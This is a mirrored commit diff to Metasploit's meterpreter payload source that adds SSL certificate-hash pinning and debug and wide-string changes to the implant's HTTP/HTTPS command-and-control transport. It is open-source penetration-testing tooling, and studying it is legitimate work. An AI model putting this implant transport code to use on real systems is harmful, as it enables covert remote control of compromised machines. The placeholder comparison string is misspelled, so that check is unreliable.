mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-01-20 20:37:27 +01:00
Add support for SSL cert validation
Tweak the SSL implemention so that for https meterpreters the SSL certificate is validated against a hash that is specified in the payload. If the hash isn't specified, then certificate validation isn't attempted.
This commit is contained in:
OJ
parent
f44b44f2ce
commit
0739cbc0f3
@ -5,8 +5,8 @@
|
||||
#ifndef _METERPRETER_SOURCE_COMMON_COMMON_H
|
||||
#define _METERPRETER_SOURCE_COMMON_COMMON_H
|
||||
|
||||
/*! @brief When defined, debug output is enabled on Windows builds. */
|
||||
#define DEBUGTRACE 1
|
||||
/*! @brief Set to 0 for "normal", and 1 to "verbose", comment out to disable completely. */
|
||||
//#define DEBUGTRACE 0
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
@ -140,6 +140,7 @@ int netlink_get_interfaces(struct ifaces_list **iface_list);
|
||||
extern int debugging_enabled;
|
||||
|
||||
#define dprintf(...) if(debugging_enabled) { real_dprintf(__FILE__, __LINE__, __FUNCTION__, __VA_ARGS__); }
|
||||
#define vdprintf(...) do{}while(0);
|
||||
|
||||
void real_dprintf(char *filename, int line, const char *function, char *format, ...);
|
||||
|
||||
@ -172,8 +173,14 @@ void real_dprintf(char *filename, int line, const char *function, char *format,
|
||||
|
||||
#ifdef DEBUGTRACE
|
||||
#define dprintf(...) real_dprintf(__VA_ARGS__)
|
||||
#if DEBUGTRACE == 1
|
||||
#define vdprintf dprintf
|
||||
#else
|
||||
#define vdprintf(...) do{}while(0);
|
||||
#endif
|
||||
#else
|
||||
#define dprintf(...) do{}while(0);
|
||||
#define vdprintf(...) do{}while(0);
|
||||
#endif
|
||||
|
||||
/*! @brief Sets `dwResult` to the return value of `GetLastError()`, prints debug output, then does `break;` */
|
||||
|
||||
@ -1351,7 +1351,7 @@ DWORD packet_transmit_via_http_winhttp(Remote *remote, Packet *packet, PacketReq
|
||||
|
||||
hRes = WinHttpSendRequest(hReq, NULL, 0, buffer, packet->payloadLength + sizeof(TlvHeader), packet->payloadLength + sizeof(TlvHeader), 0);
|
||||
|
||||
if (! hRes)
|
||||
if (!hRes)
|
||||
{
|
||||
dprintf("[PACKET RECEIVE] Failed HttpSendRequest: %d", GetLastError());
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
@ -1376,7 +1376,7 @@ DWORD packet_transmit_via_http_winhttp(Remote *remote, Packet *packet, PacketReq
|
||||
* @return An indication of the result of processing the transmission request.
|
||||
* @remark This function is not available on POSIX.
|
||||
*/
|
||||
DWORD packet_transmit_via_http_wininet( Remote *remote, Packet *packet, PacketRequestCompletion *completion )
|
||||
DWORD packet_transmit_via_http_wininet(Remote *remote, Packet *packet, PacketRequestCompletion *completion)
|
||||
{
|
||||
DWORD res = 0;
|
||||
HINTERNET hReq;
|
||||
@ -1388,8 +1388,9 @@ DWORD packet_transmit_via_http_wininet( Remote *remote, Packet *packet, PacketRe
|
||||
|
||||
flen = sizeof(flags);
|
||||
|
||||
buffer = malloc( packet->payloadLength + sizeof(TlvHeader) );
|
||||
if (! buffer) {
|
||||
buffer = malloc(packet->payloadLength + sizeof(TlvHeader));
|
||||
if (!buffer)
|
||||
{
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
return 0;
|
||||
}
|
||||
@ -1397,35 +1398,39 @@ DWORD packet_transmit_via_http_wininet( Remote *remote, Packet *packet, PacketRe
|
||||
memcpy(buffer, &packet->header, sizeof(TlvHeader));
|
||||
memcpy(buffer + sizeof(TlvHeader), packet->payload, packet->payloadLength);
|
||||
|
||||
do {
|
||||
do
|
||||
{
|
||||
|
||||
flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI;
|
||||
if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
|
||||
flags |= INTERNET_FLAG_SECURE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID;
|
||||
flags |= INTERNET_FLAG_SECURE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID;
|
||||
}
|
||||
|
||||
hReq = HttpOpenRequest(remote->hConnection, "POST", remote->uri, NULL, NULL, NULL, flags, 0);
|
||||
hReq = HttpOpenRequestW(remote->hConnection, L"POST", remote->uri, NULL, NULL, NULL, flags, 0);
|
||||
|
||||
if (hReq == NULL) {
|
||||
if (hReq == NULL)
|
||||
{
|
||||
dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError());
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
break;
|
||||
}
|
||||
|
||||
if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
|
||||
InternetQueryOption( hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, &flen);
|
||||
if (remote->transport == METERPRETER_TRANSPORT_HTTPS)
|
||||
{
|
||||
InternetQueryOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, &flen);
|
||||
flags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_UNKNOWN_CA;
|
||||
InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, flen);
|
||||
}
|
||||
|
||||
hRes = HttpSendRequest(hReq, NULL, 0, buffer, packet->payloadLength + sizeof(TlvHeader) );
|
||||
hRes = HttpSendRequest(hReq, NULL, 0, buffer, packet->payloadLength + sizeof(TlvHeader));
|
||||
|
||||
if (! hRes) {
|
||||
if (!hRes)
|
||||
{
|
||||
dprintf("[PACKET RECEIVE] Failed HttpSendRequest: %d", GetLastError());
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
break;
|
||||
}
|
||||
} while(0);
|
||||
} while (0);
|
||||
|
||||
memset(buffer, 0, packet->payloadLength + sizeof(TlvHeader));
|
||||
InternetCloseHandle(hReq);
|
||||
@ -1443,7 +1448,7 @@ DWORD packet_transmit_via_http_wininet( Remote *remote, Packet *packet, PacketRe
|
||||
* @param completion Pointer to the completion routines to process.
|
||||
* @return An indication of the result of processing the transmission request.
|
||||
*/
|
||||
DWORD packet_transmit_via_http( Remote *remote, Packet *packet, PacketRequestCompletion *completion )
|
||||
DWORD packet_transmit_via_http(Remote *remote, Packet *packet, PacketRequestCompletion *completion)
|
||||
{
|
||||
CryptoContext *crypto;
|
||||
Tlv requestId;
|
||||
@ -1453,7 +1458,7 @@ DWORD packet_transmit_via_http( Remote *remote, Packet *packet, PacketRequestCom
|
||||
#endif
|
||||
|
||||
|
||||
lock_acquire( remote->lock );
|
||||
lock_acquire(remote->lock);
|
||||
|
||||
// If the packet does not already have a request identifier, create one for it
|
||||
if (packet_get_tlv_string(packet, TLV_TYPE_REQUEST_ID, &requestId) != ERROR_SUCCESS)
|
||||
@ -1476,24 +1481,24 @@ DWORD packet_transmit_via_http( Remote *remote, Packet *packet, PacketRequestCom
|
||||
// If a completion routine was supplied and the packet has a request
|
||||
// identifier, insert the completion routine into the list
|
||||
if ((completion) &&
|
||||
(packet_get_tlv_string(packet, TLV_TYPE_REQUEST_ID,
|
||||
&requestId) == ERROR_SUCCESS))
|
||||
(packet_get_tlv_string(packet, TLV_TYPE_REQUEST_ID,
|
||||
&requestId) == ERROR_SUCCESS))
|
||||
packet_add_completion_handler((LPCSTR)requestId.buffer, completion);
|
||||
|
||||
// If the endpoint has a cipher established and this is not a plaintext
|
||||
// packet, we encrypt
|
||||
if ((crypto = remote_get_cipher(remote)) &&
|
||||
(packet_get_type(packet) != PACKET_TLV_TYPE_PLAIN_REQUEST) &&
|
||||
(packet_get_type(packet) != PACKET_TLV_TYPE_PLAIN_RESPONSE))
|
||||
(packet_get_type(packet) != PACKET_TLV_TYPE_PLAIN_REQUEST) &&
|
||||
(packet_get_type(packet) != PACKET_TLV_TYPE_PLAIN_RESPONSE))
|
||||
{
|
||||
ULONG origPayloadLength = packet->payloadLength;
|
||||
PUCHAR origPayload = packet->payload;
|
||||
|
||||
// Encrypt
|
||||
if ((res = crypto->handlers.encrypt(crypto, packet->payload,
|
||||
packet->payloadLength, &packet->payload,
|
||||
&packet->payloadLength)) !=
|
||||
ERROR_SUCCESS)
|
||||
packet->payloadLength, &packet->payload,
|
||||
&packet->payloadLength)) !=
|
||||
ERROR_SUCCESS)
|
||||
{
|
||||
SetLastError(res);
|
||||
break;
|
||||
@ -1513,7 +1518,8 @@ DWORD packet_transmit_via_http( Remote *remote, Packet *packet, PacketRequestCom
|
||||
// XXX: Implement non-windows HTTP delivery
|
||||
#endif
|
||||
|
||||
if(res < 0) {
|
||||
if (res < 0)
|
||||
{
|
||||
dprintf("[PACKET] transmit failed with return %d\n", res);
|
||||
break;
|
||||
}
|
||||
@ -1526,7 +1532,7 @@ DWORD packet_transmit_via_http( Remote *remote, Packet *packet, PacketRequestCom
|
||||
// Destroy the packet
|
||||
packet_destroy(packet);
|
||||
|
||||
lock_release( remote->lock );
|
||||
lock_release(remote->lock);
|
||||
|
||||
return res;
|
||||
}
|
||||
@ -1779,10 +1785,10 @@ DWORD packet_receive_http_via_winhttp(Remote *remote, Packet **packet)
|
||||
if (remote->transport == METERPRETER_TRANSPORT_HTTPS)
|
||||
{
|
||||
flags |= WINHTTP_FLAG_SECURE;
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] Setting secure flag..");
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] Setting secure flag..");
|
||||
}
|
||||
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] opening request on connection %x to %S", remote->hConnection, remote->uri);
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] opening request on connection %x to %S", remote->hConnection, remote->uri);
|
||||
hReq = WinHttpOpenRequest(remote->hConnection, L"POST", remote->uri, NULL, NULL, NULL, flags);
|
||||
|
||||
if (hReq == NULL)
|
||||
@ -1794,7 +1800,7 @@ DWORD packet_receive_http_via_winhttp(Remote *remote, Packet **packet)
|
||||
|
||||
if (remote->transport == METERPRETER_TRANSPORT_HTTPS)
|
||||
{
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] transport is SSL, setting up...");
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] transport is SSL, setting up...");
|
||||
flags = SECURITY_FLAG_IGNORE_UNKNOWN_CA
|
||||
| SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
|
||||
| SECURITY_FLAG_IGNORE_CERT_CN_INVALID
|
||||
@ -1805,7 +1811,7 @@ DWORD packet_receive_http_via_winhttp(Remote *remote, Packet **packet)
|
||||
}
|
||||
}
|
||||
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] sending the 'RECV' command...");
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] sending the 'RECV' command...");
|
||||
// TODO: when the MSF side supports it, update this so that it's UTF8
|
||||
char pRecv[] = "RECV";
|
||||
hRes = WinHttpSendRequest(hReq, WINHTTP_NO_ADDITIONAL_HEADERS, 0, pRecv, sizeof(pRecv), sizeof(pRecv), 0);
|
||||
@ -1819,27 +1825,63 @@ DWORD packet_receive_http_via_winhttp(Remote *remote, Packet **packet)
|
||||
|
||||
// TODO: validate the server certificate
|
||||
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] Waiting to see the response ...");
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] Waiting to see the response ...");
|
||||
if (!WinHttpReceiveResponse(hReq, NULL))
|
||||
{
|
||||
dprintf("[PACKET RECEIVE] Failed WinHttpReceiveResponse: %d", GetLastError());
|
||||
vdprintf("[PACKET RECEIVE] Failed WinHttpReceiveResponse: %d", GetLastError());
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
break;
|
||||
}
|
||||
|
||||
if (remote->pCertHash != NULL)
|
||||
{
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] validating certificate hash");
|
||||
PCERT_CONTEXT pCertContext = NULL;
|
||||
DWORD dwCertContextSize = sizeof(pCertContext);
|
||||
|
||||
if (!WinHttpQueryOption(hReq, WINHTTP_OPTION_SERVER_CERT_CONTEXT, &pCertContext, &dwCertContextSize))
|
||||
{
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] Failed to get the certificate context: %u", GetLastError());
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
break;
|
||||
}
|
||||
|
||||
DWORD dwHashSize = 20;
|
||||
BYTE hash[20];
|
||||
if (!CertGetCertificateContextProperty(pCertContext, CERT_SHA1_HASH_PROP_ID, hash, &dwHashSize))
|
||||
{
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] Failed to get the certificate hash: %u", GetLastError());
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
break;
|
||||
}
|
||||
|
||||
vdprintf("[SERVER] Server hash set to: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x",
|
||||
hash[0], hash[1], hash[2], hash[3], hash[4], hash[5], hash[6], hash[7], hash[8], hash[9], hash[10],
|
||||
hash[11], hash[12], hash[13], hash[14], hash[15], hash[16], hash[17], hash[18], hash[19]);
|
||||
|
||||
if (memcmp(hash, remote->pCertHash, 20) != 0)
|
||||
{
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] Certificate hash doesn't match, bailing out");
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
#ifdef DEBUGTRACE
|
||||
DWORD dwSize = 0;
|
||||
if (!WinHttpQueryDataAvailable(hReq, &dwSize))
|
||||
{
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] WinHttpQueryDataAvailable failed: %x", GetLastError());
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] WinHttpQueryDataAvailable failed: %x", GetLastError());
|
||||
}
|
||||
else
|
||||
{
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] Available data: %u bytes", dwSize);
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] Available data: %u bytes", dwSize);
|
||||
}
|
||||
#endif
|
||||
|
||||
// Read the packet length
|
||||
retries = 3;
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] Start looping through the receive calls");
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] Start looping through the receive calls");
|
||||
while (inHeader && retries > 0)
|
||||
{
|
||||
retries--;
|
||||
@ -1850,7 +1892,7 @@ DWORD packet_receive_http_via_winhttp(Remote *remote, Packet **packet)
|
||||
break;
|
||||
}
|
||||
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] Data received: %u bytes", bytesRead);
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] Data received: %u bytes", bytesRead);
|
||||
|
||||
// If the response contains no data, this is fine, it just means the
|
||||
// remote side had nothing to tell us. Indicate this through a
|
||||
@ -1884,7 +1926,7 @@ DWORD packet_receive_http_via_winhttp(Remote *remote, Packet **packet)
|
||||
}
|
||||
|
||||
// Initialize the header
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] initialising header");
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] initialising header");
|
||||
header.length = header.length;
|
||||
header.type = header.type;
|
||||
payloadLength = ntohl(header.length) - sizeof(TlvHeader);
|
||||
@ -1901,7 +1943,7 @@ DWORD packet_receive_http_via_winhttp(Remote *remote, Packet **packet)
|
||||
retries = payloadBytesLeft;
|
||||
while (payloadBytesLeft > 0 && retries > 0)
|
||||
{
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] reading more data from the body...");
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] reading more data from the body...");
|
||||
retries--;
|
||||
if (!WinHttpReadData(hReq, payload + payloadLength - payloadBytesLeft, payloadBytesLeft, &bytesRead))
|
||||
{
|
||||
@ -1912,14 +1954,12 @@ DWORD packet_receive_http_via_winhttp(Remote *remote, Packet **packet)
|
||||
|
||||
if (!bytesRead)
|
||||
{
|
||||
dprintf("PAYLOAD: %s", payload);
|
||||
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] no bytes read, bailing out");
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] no bytes read, bailing out");
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
break;
|
||||
}
|
||||
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] bytes read: %u", bytesRead);
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] bytes read: %u", bytesRead);
|
||||
payloadBytesLeft -= bytesRead;
|
||||
}
|
||||
|
||||
@ -2023,14 +2063,16 @@ DWORD packet_receive_http_via_wininet( Remote *remote, Packet **packet )
|
||||
|
||||
lock_acquire( remote->lock );
|
||||
|
||||
do {
|
||||
do
|
||||
{
|
||||
|
||||
flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI;
|
||||
if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
|
||||
flags |= INTERNET_FLAG_SECURE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID;
|
||||
}
|
||||
|
||||
dprintf("[PACKET RECEIVE] HttpOpenRequest");
|
||||
hReq = HttpOpenRequest( remote->hConnection, "POST", remote->uri, NULL, NULL, NULL, flags, 0 );
|
||||
hReq = HttpOpenRequestW(remote->hConnection, L"POST", remote->uri, NULL, NULL, NULL, flags, 0 );
|
||||
|
||||
if (hReq == NULL) {
|
||||
dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError());
|
||||
@ -2041,7 +2083,7 @@ DWORD packet_receive_http_via_wininet( Remote *remote, Packet **packet )
|
||||
if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
|
||||
InternetQueryOption( hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, &flen);
|
||||
flags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_UNKNOWN_CA;
|
||||
InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, flen);
|
||||
InternetSetOptionW(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, flen);
|
||||
}
|
||||
|
||||
hRes = HttpSendRequest(hReq, NULL, 0, "RECV", 4 );
|
||||
|
||||
@ -43,6 +43,7 @@ typedef struct _Remote
|
||||
wchar_t* uri; ///< URI endpoint in use during HTTP or HTTPS transport use.
|
||||
HANDLE hInternet; ///< Handle to the internet module for use with HTTP and HTTPS.
|
||||
HANDLE hConnection; ///< Handle to the HTTP or HTTPS connection.
|
||||
PBYTE pCertHash; ///< Pointer to the 20-byte certificate hash to validate
|
||||
|
||||
int expiration_time; ///< Unix timestamp for when the server should shut down.
|
||||
int start_time; ///< Unix timestamp representing the session startup time.
|
||||
|
||||
@ -21,6 +21,7 @@ wchar_t * global_meterpreter_ua = L"METERPRETER_UA\x00\x00\x00\x00\x00\x00\x00\x
|
||||
wchar_t * global_meterpreter_proxy = L"METERPRETER_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
|
||||
wchar_t * global_meterpreter_proxy_username = L"METERPRETER_USERNAME_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
|
||||
wchar_t * global_meterpreter_proxy_password = L"METERPRETER_PASSWORD_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
|
||||
PBYTE global_meterpreter_ssl_cert_hash = "METERPRETER_SSL_CERT_HASH\x00";
|
||||
int global_expiration_timeout = 0xb64be661;
|
||||
int global_comm_timeout = 0xaf79257f;
|
||||
|
||||
@ -737,8 +738,17 @@ DWORD server_setup(SOCKET fd)
|
||||
}
|
||||
else if (wcscmp(global_meterpreter_transport + 12, L"TRANSPORT_HTTPS") == 0)
|
||||
{
|
||||
PBYTE hash = global_meterpreter_ssl_cert_hash;
|
||||
pRemote->transport = METERPRETER_TRANSPORT_HTTPS;
|
||||
dprintf("[SERVER] Using HTTPS transport...");
|
||||
dprintf("[SERVER] Using HTTPS transport: Hash set to: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x",
|
||||
hash[0], hash[1], hash[2], hash[3], hash[4], hash[5], hash[6], hash[7], hash[8], hash[9], hash[10],
|
||||
hash[11], hash[12], hash[13], hash[14], hash[15], hash[16], hash[17], hash[18], hash[19]);
|
||||
|
||||
if (strcmp(hash, "METERPETER_SSL_CERT_HASH") != 0)
|
||||
{
|
||||
pRemote->pCertHash = hash;
|
||||
dprintf("[SERVER] is validating hashes %p", pRemote->pCertHash);
|
||||
}
|
||||
}
|
||||
else if (wcscmp(global_meterpreter_transport + 12, L"TRANSPORT_HTTP") == 0)
|
||||
{
|
||||
|
||||
@ -9,6 +9,9 @@
|
||||
|
||||
#ifdef USE_WINHTTP
|
||||
|
||||
#define HOSTNAME_LEN 512
|
||||
#define URLPATH_LEN 1024
|
||||
|
||||
DWORD server_dispatch_http_winhttp(Remote* remote, THREAD* serverThread, int iExpirationTimeout, int iCommTimeout,
|
||||
wchar_t* pMetUA, wchar_t* pMetProxy, wchar_t* pMetProxyUser, wchar_t* pMetProxyPass)
|
||||
{
|
||||
@ -71,10 +74,10 @@ DWORD server_dispatch_http_winhttp(Remote* remote, THREAD* serverThread, int iEx
|
||||
ZeroMemory(&bits, sizeof(bits));
|
||||
bits.dwStructSize = sizeof(bits);
|
||||
|
||||
bits.dwHostNameLength = sizeof(tmpHostName)-1;
|
||||
bits.dwHostNameLength = HOSTNAME_LEN - 1;
|
||||
bits.lpszHostName = tmpHostName;
|
||||
|
||||
bits.dwUrlPathLength = sizeof(tmpUrlPath)-1;
|
||||
bits.dwUrlPathLength = URLPATH_LEN - 1;
|
||||
bits.lpszUrlPath = tmpUrlPath;
|
||||
|
||||
WinHttpCrackUrl(remote->url, 0, 0, &bits);
|
||||
|
||||
@ -3,6 +3,9 @@
|
||||
|
||||
#ifndef USE_WINHTTP
|
||||
|
||||
#define HOSTNAME_LEN 512
|
||||
#define URLPATH_LEN 1024
|
||||
|
||||
DWORD server_dispatch_http_wininet(Remote * remote, THREAD* serverThread, int iExpirationTimeout, int iCommTimeout,
|
||||
wchar_t* pMetUA, wchar_t* pMetProxy, wchar_t* pMetProxyUser, wchar_t* pMetProxyPass)
|
||||
{
|
||||
@ -13,8 +16,8 @@ DWORD server_dispatch_http_wininet(Remote * remote, THREAD* serverThread, int iE
|
||||
URL_COMPONENTS bits;
|
||||
DWORD ecount = 0;
|
||||
DWORD delay = 0;
|
||||
char tmpHostName[512];
|
||||
char tmpUrlPath[1024];
|
||||
wchar_t tmpHostName[HOSTNAME_LEN];
|
||||
wchar_t tmpUrlPath[URLPATH_LEN];
|
||||
|
||||
remote->expiration_time = 0;
|
||||
if (iExpirationTimeout > 0)
|
||||
@ -27,7 +30,7 @@ DWORD server_dispatch_http_wininet(Remote * remote, THREAD* serverThread, int iE
|
||||
remote->comm_last_packet = current_unix_timestamp();
|
||||
|
||||
// Allocate the top-level handle
|
||||
if (!strcmp(pMetProxy, "METERPRETER_PROXY"))
|
||||
if (!wcscmp(pMetProxy, L"METERPRETER_PROXY"))
|
||||
{
|
||||
remote->hInternet = InternetOpen(pMetUA, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
|
||||
}
|
||||
@ -45,22 +48,22 @@ DWORD server_dispatch_http_wininet(Remote * remote, THREAD* serverThread, int iE
|
||||
dprintf("[DISPATCH] Configured hInternet: 0x%.8x", remote->hInternet);
|
||||
|
||||
// The InternetCrackUrl method was poorly designed...
|
||||
memset(tmpHostName, 0, sizeof(tmpHostName));
|
||||
memset(tmpUrlPath, 0, sizeof(tmpUrlPath));
|
||||
ZeroMemory(tmpHostName, sizeof(tmpHostName));
|
||||
ZeroMemory(tmpUrlPath, sizeof(tmpUrlPath));
|
||||
ZeroMemory(&bits, sizeof(bits));
|
||||
|
||||
memset(&bits, 0, sizeof(bits));
|
||||
bits.dwStructSize = sizeof(bits);
|
||||
bits.dwHostNameLength = sizeof(tmpHostName)-1;
|
||||
bits.dwHostNameLength = HOSTNAME_LEN - 1;
|
||||
bits.lpszHostName = tmpHostName;
|
||||
bits.dwUrlPathLength = sizeof(tmpUrlPath)-1;
|
||||
bits.dwUrlPathLength = URLPATH_LEN - 1;
|
||||
bits.lpszUrlPath = tmpUrlPath;
|
||||
|
||||
InternetCrackUrl(remote->url, 0, 0, &bits);
|
||||
|
||||
remote->uri = _strdup(tmpUrlPath);
|
||||
remote->uri = _wcsdup(tmpUrlPath);
|
||||
|
||||
dprintf("[DISPATCH] Configured URL: %s", remote->uri);
|
||||
dprintf("[DISPATCH] Host: %s Port: %u", tmpHostName, bits.nPort);
|
||||
dprintf("[DISPATCH] Configured URL: %S", remote->uri);
|
||||
dprintf("[DISPATCH] Host: %S Port: %u", tmpHostName, bits.nPort);
|
||||
|
||||
// Allocate the connection handle
|
||||
remote->hConnection = InternetConnect(remote->hInternet, tmpHostName, bits.nPort, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
|
||||
@ -73,11 +76,11 @@ DWORD server_dispatch_http_wininet(Remote * remote, THREAD* serverThread, int iE
|
||||
dprintf("[DISPATCH] Configured hConnection: 0x%.8x", remote->hConnection);
|
||||
|
||||
//authentication
|
||||
if (!(strcmp(pMetProxyUser, "METERPRETER_USERNAME_PROXY") == 0))
|
||||
if (!(wcscmp(pMetProxyUser, L"METERPRETER_USERNAME_PROXY") == 0))
|
||||
{
|
||||
InternetSetOption(remote->hConnection, INTERNET_OPTION_PROXY_USERNAME, pMetProxyUser, (DWORD)strlen(pMetProxyUser) + 1);
|
||||
InternetSetOption(remote->hConnection, INTERNET_OPTION_PROXY_PASSWORD, pMetProxyPass, (DWORD)strlen(pMetProxyPass) + 1);
|
||||
dprintf("[DISPATCH] Proxy authentication configured : %s/%s", pMetProxyUser, pMetProxyPass);
|
||||
InternetSetOption(remote->hConnection, INTERNET_OPTION_PROXY_USERNAME, pMetProxyUser, (DWORD)wcslen(pMetProxyUser) + 1);
|
||||
InternetSetOption(remote->hConnection, INTERNET_OPTION_PROXY_PASSWORD, pMetProxyPass, (DWORD)wcslen(pMetProxyPass) + 1);
|
||||
dprintf("[DISPATCH] Proxy authentication configured : %S/%S", pMetProxyUser, pMetProxyPass);
|
||||
}
|
||||
|
||||
// Bring up the scheduler subsystem.
|
||||
|
||||
@ -171,7 +171,7 @@
|
||||
<Culture>0x0409</Culture>
|
||||
</ResourceCompile>
|
||||
<Link>
|
||||
<AdditionalDependencies>backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;crypt32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||
<AdditionalLibraryDirectories>..\backcompat\$(Configuration);..\common\$(Configuration); ..\..\source\openssl\lib\win\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<ModuleDefinitionFile>..\..\source\server\win\metsrv.def</ModuleDefinitionFile>
|
||||
@ -232,7 +232,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
|
||||
<Culture>0x0409</Culture>
|
||||
</ResourceCompile>
|
||||
<Link>
|
||||
<AdditionalDependencies>backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<AdditionalDependencies>backcompat.lib;ws2_32.lib;odbc32.lib;odbccp32.lib;crypt32.lib;wininet.lib;winhttp.lib;ssleay32.lib;libeay32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||
<SuppressStartupBanner>true</SuppressStartupBanner>
|
||||
<AdditionalLibraryDirectories>..\backcompat\$(Configuration);..\common\$(Configuration); ..\..\source\openssl\lib\win\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
